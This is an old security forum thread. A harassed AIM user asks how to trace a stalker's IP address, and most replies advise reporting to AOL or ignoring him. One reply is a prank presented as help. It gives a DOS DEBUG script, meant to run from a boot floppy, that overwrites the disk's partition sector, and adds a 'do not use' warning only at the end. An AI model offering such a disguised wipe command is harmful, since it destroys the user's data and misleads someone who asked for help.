Page 1 of 3 123 LastLast

Thread: Trying To Figure Out A Stranger

Trying To Figure Out A Stranger

Hi everyone... I'm not that great with security or hacking so I decided to come here for help.

I'm not doing this for fun or anything. Story is, I have this guy who IM's my friends and I on AIM talking about how he wants to make us crash and burn and then make our lives miserable. Apparantly, he has been stalking us also because he knows when and where we hang out every night. I'm guessing he's someone from the past trying to scare us but it's getting so irritating.

So, I was wondering... what's a good way to find someone's IP address on AIM for a newbie? I want to figure out this guy's deal before he actually goes through with his threats.

Banned
    Report him to AOL.

If you cannot get his IP address on your own, you will not be able to do anything to him when you find it.

And even if you did manage to get an IP, the person could be using a Proxy.

I would just do as Dop has suggested and just report him/her and send a copy of the messages that they have sent.
    And let them take care of the rest..

AFLAAACKKK!!
    The great god's of AOL gave us the almighty "ignore" feature... I suggest you use it...
    I am the uber duck!!1
    Proxy Tools

They also gave AIM screen name registering without e-mail confirmation those idiots.
    O.G at A.O

Originally posted here by .:front2back:.
    And even if you did manage to get an IP, the person could be using a Proxy.
    I'm intrigued to know how to trace the true IP address if someone is using a proxy. The suggetsion in this thread is that AOL could do somthing about the posts so, presumably, they could find the true IP address. I know that no proxy allows absolute anonymity.

I know that no proxy allows absolute anonymity.
    But what if they were using some person's computer that they had slyly installed a root kit on.?
    So then AOL thinking they've caught the person gain the IP details from this innocent person.
    They then call the ISP get the innocent person's internet canceled, then realise that infact that they got the wrong person, and then they are at the start once again..
    By that time the attacker would be long gone sending hate mail to some other person..

cheers
    front2back

In my opinion you sound like a skiddie trying to get a friends IP to packet them. If you really aren't lieing just take everybodies advice and just report it to AOL, even if they are using AIM, I would suspect that they can help you out anyways since it IS AOL Instant Messenger
    WARNING: THIS SIGNATURE IS SHAREWARE PLEASE REGISTER THIS SIGNATURE BY SENDING ME MONEY TO SEE THE COMPLETE SIGNATURE!

Re: Trying To Figure Out A Stranger

Originally posted here by infectedkilljoy
    So, I was wondering... what's a good way to find someone's IP address on AIM for a newbie? I want to figure out this guy's deal before he actually goes through with his threats.
    Spoon feed me how I become a script Kiddie!
    You can read my diaries and learn how to become a script kiddie when I'm six feet under!
    \"The only truly secure system is one that is powered off, cast in a block of concrete and sealed in a lead-lined room with armed guards - and even then I have my doubts\".....Spaf
    Everytime I learn a new thing, I discover how ignorant I am.- ... Black Cluster

infectedkilljoy:

Create a text file called A:\DELPART.TXT with your favorite text editor. Then copy the next few lines of text...
    a 100 int13rax
    rbx
    f 200 l 200 0
    rcx
    rdx
    p
    q
    ...into the file and copy it to a DOS boot floppy along with a copy of DEBUG.EXE.

Boot with the floppy and at the command prompt, type:

Debug < Delpart.txt

Or report to AOL and move on.

Seriously; WTF are you going to do with an IP Address? Nmap? DdoS? Break into the ISP's Finance department, get their address and burn the house down?

Another year and still the same ****!

P.S. DO NOT USE THE ABOVE COMMANDS *****************************
    09:F9:11:02:9D:74:E3:5B8:41:56:C5:63:56:88:C0